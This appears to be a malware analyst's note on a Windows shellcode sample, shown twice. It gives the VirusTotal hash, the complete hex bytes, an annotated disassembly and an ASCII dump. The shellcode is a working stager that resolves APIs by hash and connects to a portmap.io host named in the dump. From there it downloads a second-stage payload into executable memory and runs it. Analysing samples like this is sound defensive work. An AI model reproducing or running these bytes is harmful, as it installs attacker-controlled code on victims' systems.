nguyenl95/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f

## 0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f
## uploaded by @JohnLaTwC
https://www.virustotal.com/en/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/analysis/
https://docs.microsoft.com/en-us/windows/desktop/api/wininet/nf-wininet-internetconnecta
void InternetConnectA(
  HINTERNET     hInternet,
  LPCSTR        lpszServerName,
  INTERNET_PORT nServerPort,
  LPCSTR        lpszUserName,
  LPCSTR        lpszPassword,
  DWORD         dwService,
  DWORD         dwFlags,
  DWORD_PTR     dwContext
);
Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 68 7e f9 00 00 e8 b0 00 00 00 2f 67 53 4d 37 34 54 51 53 41 30 75 51 7a 70 48 50 79 7a 62 38 70 41 33 70 2d 32 59 6d 33 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 65 70 65 6c 69 78 2d 36 33 38 37 30 2e 70 6f 72 74 6d 61 70 2e 69 6f 00
0x00000000 fc               cld
0x00000001 e882000000       call 0x00000088
0x00000006 60               pushad
0x00000007 89e5             mov ebp,esp
0x00000009 31c0             xor eax,eax
0x0000000b 648b5030         fs: mov edx,dword [eax + 48]
0x0000000f 8b520c           mov edx,dword [edx + 12]
0x00000012 8b5214           mov edx,dword [edx + 20]
0x00000015 8b7228           mov esi,dword [edx + 40]
0x00000018 0fb74a26         movzx ecx,word [edx + 38]
0x0000001c 31ff             xor edi,edi
0x0000001e ac               lodsb
0x0000001f 3c61             cmp al,97
0x00000021 7c02             jl 0x00000025
0x00000023 2c20             sub al,32
0x00000025 c1cf0d           ror edi,13
0x00000028 01c7             add edi,eax
0x0000002a e2f2             loop 0x0000001e
0x0000002c 52               push edx
0x0000002d 57               push edi
0x0000002e 8b5210           mov edx,dword [edx + 16]
0x00000031 8b4a3c           mov ecx,dword [edx + 60]
0x00000034 8b4c1178         mov ecx,dword [ecx + edx + 120]
0x00000038 e348             jecxz 0x00000082
0x0000003a 01d1             add ecx,edx
0x0000003c 51               push ecx
0x0000003d 8b5920           mov ebx,dword [ecx + 32]
0x00000040 01d3             add ebx,edx
0x00000042 8b4918           mov ecx,dword [ecx + 24]
0x00000045 e33a             jecxz 0x00000081
0x00000047 49               dec ecx
0x00000048 8b348b           mov esi,dword [ebx + ecx * 4]
0x0000004b 01d6             add esi,edx
0x0000004d 31ff             xor edi,edi
0x0000004f ac               lodsb
0x00000050 c1cf0d           ror edi,13
0x00000053 01c7             add edi,eax
0x00000055 38e0             cmp al,ah
0x00000057 75f6             jnz 0x0000004f
0x00000059 037df8           add edi,dword [ebp - 8]
0x0000005c 3b7d24           cmp edi,dword [ebp + 36]
0x0000005f 75e4             jnz 0x00000045
0x00000061 58               pop eax
0x00000062 8b5824           mov ebx,dword [eax + 36]
0x00000065 01d3             add ebx,edx
0x00000067 668b0c4b         mov cx,word [ebx + ecx * 2]
0x0000006b 8b581c           mov ebx,dword [eax + 28]
0x0000006e 01d3             add ebx,edx
0x00000070 8b048b           mov eax,dword [ebx + ecx * 4]
0x00000073 01d0             add eax,edx
0x00000075 89442424         mov dword [esp + 36],eax
0x00000079 5b               pop ebx
0x0000007a 5b               pop ebx
0x0000007b 61               popad
0x0000007c 59               pop ecx
0x0000007d 5a               pop edx
0x0000007e 51               push ecx
0x0000007f ffe0             jmp eax
0x00000081 5f               pop edi
0x00000082 5f               pop edi
0x00000083 5a               pop edx
0x00000084 8b12             mov edx,dword [edx]
0x00000086 eb8d             jmp 0x00000015
0x00000088 5d               pop ebp
0x00000089 686e657400       push 0x0074656e--> 'ten'
0x0000008e 6877696e69       push 0x696e6977--> 'iniw'
0x00000093 54               push esp
0x00000094 684c772607       push 0x0726774c--> '&wL'
0x00000099 ffd5             call ebp --> kernel32.dll!LoadLibraryA
0x0000009b 31db             xor ebx,ebx
0x0000009d 53               push ebx
0x0000009e 53               push ebx
0x0000009f 53               push ebx
0x000000a0 53               push ebx
0x000000a1 53               push ebx
0x000000a2 683a5679a7       push 0xa779563a--> 'yV:'
0x000000a7 ffd5             call ebp --> wininet.dll!InternetOpenA
0x000000a9 53               push ebx
0x000000aa 53               push ebx
0x000000ab 6a03             push 3
0x000000ad 53               push ebx
0x000000ae 53               push ebx
0x000000af 687ef90000       push 0x0000f97e
0x000000b4 e8b0000000       call 0x00000169
0x000000b9 2f               das         <-- start of url
0x000000ba 6753             push ebx
0x000000bc 4d               dec ebp
0x000000bd 37               aaa
0x000000be 3454             xor al,84
0x000000c0 51               push ecx
0x000000c1 53               push ebx
0x000000c2 41               inc ecx
0x000000c3 307551           xor byte [ebp + 81],dh
0x000000c6 7a70             jpe 0x00000138
0x000000c8 48               dec eax
0x000000c9 50               push eax
0x000000ca 797a             jns 0x00000146
0x000000cc 6238             bound edi,dword [eax]
0x000000ce 7041             jo 0x00000111
0x000000d0 33702d           xor esi,dword [eax + 45]
0x000000d3 32596d           xor bl,byte [ecx + 109]
0x000000d6 3300             xor eax,dword [eax]
0x000000d8 50               push eax
0x000000d9 6857899fc6       push 0xc69f8957
0x000000de ffd5             call ebp --> wininet.dll!InternetConnectA
0x000000e0 89c6             mov esi,eax
0x000000e2 53               push ebx
0x000000e3 680032e084       push 0x84e03200
0x000000e8 53               push ebx
0x000000e9 53               push ebx
0x000000ea 53               push ebx
0x000000eb 57               push edi
0x000000ec 53               push ebx
0x000000ed 56               push esi
0x000000ee 68eb552e3b       push 0x3b2e55eb--> ';.U'
0x000000f3 ffd5             call ebp --> wininet.dll!HttpOpenRequestA
0x000000f5 96               xchg eax,esi
0x000000f6 6a0a             push 10
0x000000f8 5f               pop edi
0x000000f9 6880330000       push 0x00003380
0x000000fe 89e0             mov eax,esp
0x00000100 6a04             push 4
0x00000102 50               push eax
0x00000103 6a1f             push 31
0x00000105 56               push esi
0x00000106 6875469e86       push 0x869e4675--> 'Fu'
0x0000010b ffd5             call ebp --> wininet.dll!InternetSetOptionA
0x0000010d 53               push ebx
0x0000010e 53               push ebx
0x0000010f 53               push ebx
0x00000110 53               push ebx
0x00000111 56               push esi
0x00000112 682d06187b       push 0x7b18062d--> '{-'
0x00000117 ffd5             call ebp --> wininet.dll!HttpSendRequestA
0x00000119 85c0             test eax,eax
0x0000011b 7516             jnz 0x00000133
0x0000011d 6888130000       push 0x00001388
0x00000122 6844f035e0       push 0xe035f044--> '5D'
0x00000127 ffd5             call ebp --> kernel32.dll!Sleep
0x00000129 4f               dec edi
0x0000012a 75cd             jnz 0x000000f9
0x0000012c 68f0b5a256       push 0x56a2b5f0
0x00000131 ffd5             call ebp --> kernel32.dll!ExitProcess
0x00000133 6a40             push 64
0x00000135 6800100000       push 4096
0x0000013a 6800004000       push 0x00400000
0x0000013f 53               push ebx
0x00000140 6858a453e5       push 0xe553a458--> 'SX'
0x00000145 ffd5             call ebp --> kernel32.dll!VirtualAlloc
0x00000147 93               xchg eax,ebx
0x00000148 53               push ebx
0x00000149 53               push ebx
0x0000014a 89e7             mov edi,esp
0x0000014c 57               push edi
0x0000014d 6800200000       push 0x00002000
0x00000152 53               push ebx
0x00000153 56               push esi
0x00000154 68129689e2       push 0xe2899612
0x00000159 ffd5             call ebp --> wininet.dll!InternetReadFile
0x0000015b 85c0             test eax,eax
0x0000015d 74cd             jz 0x0000012c
0x0000015f 8b07             mov eax,dword [edi]
0x00000161 01c3             add ebx,eax
0x00000163 85c0             test eax,eax
0x00000165 75e5             jnz 0x0000014c
0x00000167 58               pop eax
0x00000168 c3               ret
0x00000169 5f               pop edi
0x0000016a e869ffffff       call 0x000000d8
0x0000016f 657065           gs: jo 0x000001d7   <--- start of domain
0x00000172 6c               insb byte [esi],edx
0x00000173 69782d36333837   imul edi,dword [eax + 45],0x37383336
0x0000017a 302e             xor byte [esi],ch
0x0000017c 706f             jo 0x000001ed
0x0000017e 7274             jc 0x000001f4
0x00000180 6d               insd dword [esi],edx
0x00000181 61               popad
0x00000182 702e             jo 0x000001b2

Byte Dump:
......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSh~......../gSM74TQSA0uQzpHPyzb8pA3p-2Ym3.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...epelix-63870.portmap.io.
	## uploaded by @JohnLaTwC
	https://www.virustotal.com/en/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/analysis/
	https://docs.microsoft.com/en-us/windows/desktop/api/wininet/nf-wininet-internetconnecta
	void InternetConnectA(
	HINTERNET hInternet,
	LPCSTR lpszServerName,
	INTERNET_PORT nServerPort,
	LPCSTR lpszUserName,
	LPCSTR lpszPassword,
	DWORD dwService,
	DWORD dwFlags,
	DWORD_PTR dwContext
	);
	Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 68 7e f9 00 00 e8 b0 00 00 00 2f 67 53 4d 37 34 54 51 53 41 30 75 51 7a 70 48 50 79 7a 62 38 70 41 33 70 2d 32 59 6d 33 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 65 70 65 6c 69 78 2d 36 33 38 37 30 2e 70 6f 72 74 6d 61 70 2e 69 6f 00
	0x00000000 fc cld
	0x00000001 e882000000 call 0x00000088
	0x00000006 60 pushad
	0x00000007 89e5 mov ebp,esp
	0x00000009 31c0 xor eax,eax
	0x0000000b 648b5030 fs: mov edx,dword [eax + 48]
	0x0000000f 8b520c mov edx,dword [edx + 12]
	0x00000012 8b5214 mov edx,dword [edx + 20]
	0x00000015 8b7228 mov esi,dword [edx + 40]
	0x00000018 0fb74a26 movzx ecx,word [edx + 38]
	0x0000001c 31ff xor edi,edi
	0x0000001e ac lodsb
	0x0000001f 3c61 cmp al,97
	0x00000021 7c02 jl 0x00000025
	0x00000023 2c20 sub al,32
	0x00000025 c1cf0d ror edi,13
	0x00000028 01c7 add edi,eax
	0x0000002a e2f2 loop 0x0000001e
	0x0000002c 52 push edx
	0x0000002d 57 push edi
	0x0000002e 8b5210 mov edx,dword [edx + 16]
	0x00000031 8b4a3c mov ecx,dword [edx + 60]
	0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]
	0x00000038 e348 jecxz 0x00000082
	0x0000003a 01d1 add ecx,edx
	0x0000003c 51 push ecx
	0x0000003d 8b5920 mov ebx,dword [ecx + 32]
	0x00000040 01d3 add ebx,edx
	0x00000042 8b4918 mov ecx,dword [ecx + 24]
	0x00000045 e33a jecxz 0x00000081
	0x00000047 49 dec ecx
	0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
	0x0000004b 01d6 add esi,edx
	0x0000004d 31ff xor edi,edi
	0x0000004f ac lodsb
	0x00000050 c1cf0d ror edi,13
	0x00000053 01c7 add edi,eax
	0x00000055 38e0 cmp al,ah
	0x00000057 75f6 jnz 0x0000004f
	0x00000059 037df8 add edi,dword [ebp - 8]
	0x0000005c 3b7d24 cmp edi,dword [ebp + 36]
	0x0000005f 75e4 jnz 0x00000045
	0x00000061 58 pop eax
	0x00000062 8b5824 mov ebx,dword [eax + 36]
	0x00000065 01d3 add ebx,edx
	0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]
	0x0000006b 8b581c mov ebx,dword [eax + 28]
	0x0000006e 01d3 add ebx,edx
	0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
	0x00000073 01d0 add eax,edx
	0x00000075 89442424 mov dword [esp + 36],eax
	0x00000079 5b pop ebx
	0x0000007a 5b pop ebx
	0x0000007b 61 popad
	0x0000007c 59 pop ecx
	0x0000007d 5a pop edx
	0x0000007e 51 push ecx
	0x0000007f ffe0 jmp eax
	0x00000081 5f pop edi
	0x00000082 5f pop edi
	0x00000083 5a pop edx
	0x00000084 8b12 mov edx,dword [edx]
	0x00000086 eb8d jmp 0x00000015
	0x00000088 5d pop ebp
	0x00000089 686e657400 push 0x0074656e--> 'ten'
	0x0000008e 6877696e69 push 0x696e6977--> 'iniw'
	0x00000093 54 push esp
	0x00000094 684c772607 push 0x0726774c--> '&wL'
	0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
	0x0000009b 31db xor ebx,ebx
	0x0000009d 53 push ebx
	0x0000009e 53 push ebx
	0x0000009f 53 push ebx
	0x000000a0 53 push ebx
	0x000000a1 53 push ebx
	0x000000a2 683a5679a7 push 0xa779563a--> 'yV:'
	0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA
	0x000000a9 53 push ebx
	0x000000aa 53 push ebx
	0x000000ab 6a03 push 3
	0x000000ad 53 push ebx
	0x000000ae 53 push ebx
	0x000000af 687ef90000 push 0x0000f97e
	0x000000b4 e8b0000000 call 0x00000169
	0x000000b9 2f das <-- start of url
	0x000000ba 6753 push ebx
	0x000000bc 4d dec ebp
	0x000000bd 37 aaa
	0x000000be 3454 xor al,84
	0x000000c0 51 push ecx
	0x000000c1 53 push ebx
	0x000000c2 41 inc ecx
	0x000000c3 307551 xor byte [ebp + 81],dh
	0x000000c6 7a70 jpe 0x00000138
	0x000000c8 48 dec eax
	0x000000c9 50 push eax
	0x000000ca 797a jns 0x00000146
	0x000000cc 6238 bound edi,dword [eax]
	0x000000ce 7041 jo 0x00000111
	0x000000d0 33702d xor esi,dword [eax + 45]
	0x000000d3 32596d xor bl,byte [ecx + 109]
	0x000000d6 3300 xor eax,dword [eax]
	0x000000d8 50 push eax
	0x000000d9 6857899fc6 push 0xc69f8957
	0x000000de ffd5 call ebp --> wininet.dll!InternetConnectA
	0x000000e0 89c6 mov esi,eax
	0x000000e2 53 push ebx
	0x000000e3 680032e084 push 0x84e03200
	0x000000e8 53 push ebx
	0x000000e9 53 push ebx
	0x000000ea 53 push ebx
	0x000000eb 57 push edi
	0x000000ec 53 push ebx
	0x000000ed 56 push esi
	0x000000ee 68eb552e3b push 0x3b2e55eb--> ';.U'
	0x000000f3 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
	0x000000f5 96 xchg eax,esi
	0x000000f6 6a0a push 10
	0x000000f8 5f pop edi
	0x000000f9 6880330000 push 0x00003380
	0x000000fe 89e0 mov eax,esp
	0x00000100 6a04 push 4
	0x00000102 50 push eax
	0x00000103 6a1f push 31
	0x00000105 56 push esi
	0x00000106 6875469e86 push 0x869e4675--> 'Fu'
	0x0000010b ffd5 call ebp --> wininet.dll!InternetSetOptionA
	0x0000010d 53 push ebx
	0x0000010e 53 push ebx
	0x0000010f 53 push ebx
	0x00000110 53 push ebx
	0x00000111 56 push esi
	0x00000112 682d06187b push 0x7b18062d--> '{-'
	0x00000117 ffd5 call ebp --> wininet.dll!HttpSendRequestA
	0x00000119 85c0 test eax,eax
	0x0000011b 7516 jnz 0x00000133
	0x0000011d 6888130000 push 0x00001388
	0x00000122 6844f035e0 push 0xe035f044--> '5D'
	0x00000127 ffd5 call ebp --> kernel32.dll!Sleep
	0x00000129 4f dec edi
	0x0000012a 75cd jnz 0x000000f9
	0x0000012c 68f0b5a256 push 0x56a2b5f0
	0x00000131 ffd5 call ebp --> kernel32.dll!ExitProcess
	0x00000133 6a40 push 64
	0x00000135 6800100000 push 4096
	0x0000013a 6800004000 push 0x00400000
	0x0000013f 53 push ebx
	0x00000140 6858a453e5 push 0xe553a458--> 'SX'
	0x00000145 ffd5 call ebp --> kernel32.dll!VirtualAlloc
	0x00000147 93 xchg eax,ebx
	0x00000148 53 push ebx
	0x00000149 53 push ebx
	0x0000014a 89e7 mov edi,esp
	0x0000014c 57 push edi
	0x0000014d 6800200000 push 0x00002000
	0x00000152 53 push ebx
	0x00000153 56 push esi
	0x00000154 68129689e2 push 0xe2899612
	0x00000159 ffd5 call ebp --> wininet.dll!InternetReadFile
	0x0000015b 85c0 test eax,eax
	0x0000015d 74cd jz 0x0000012c
	0x0000015f 8b07 mov eax,dword [edi]
	0x00000161 01c3 add ebx,eax
	0x00000163 85c0 test eax,eax
	0x00000165 75e5 jnz 0x0000014c
	0x00000167 58 pop eax
	0x00000168 c3 ret
	0x00000169 5f pop edi
	0x0000016a e869ffffff call 0x000000d8
	0x0000016f 657065 gs: jo 0x000001d7 <--- start of domain
	0x00000172 6c insb byte [esi],edx
	0x00000173 69782d36333837 imul edi,dword [eax + 45],0x37383336
	0x0000017a 302e xor byte [esi],ch
	0x0000017c 706f jo 0x000001ed
	0x0000017e 7274 jc 0x000001f4
	0x00000180 6d insd dword [esi],edx
	0x00000181 61 popad
	0x00000182 702e jo 0x000001b2

	Byte Dump:
	......`..1.d.P0.R.R..r(..J&1..<a\|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSh~......../gSM74TQSA0uQzpHPyzb8pA3p-2Ym3.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...epelix-63870.portmap.io.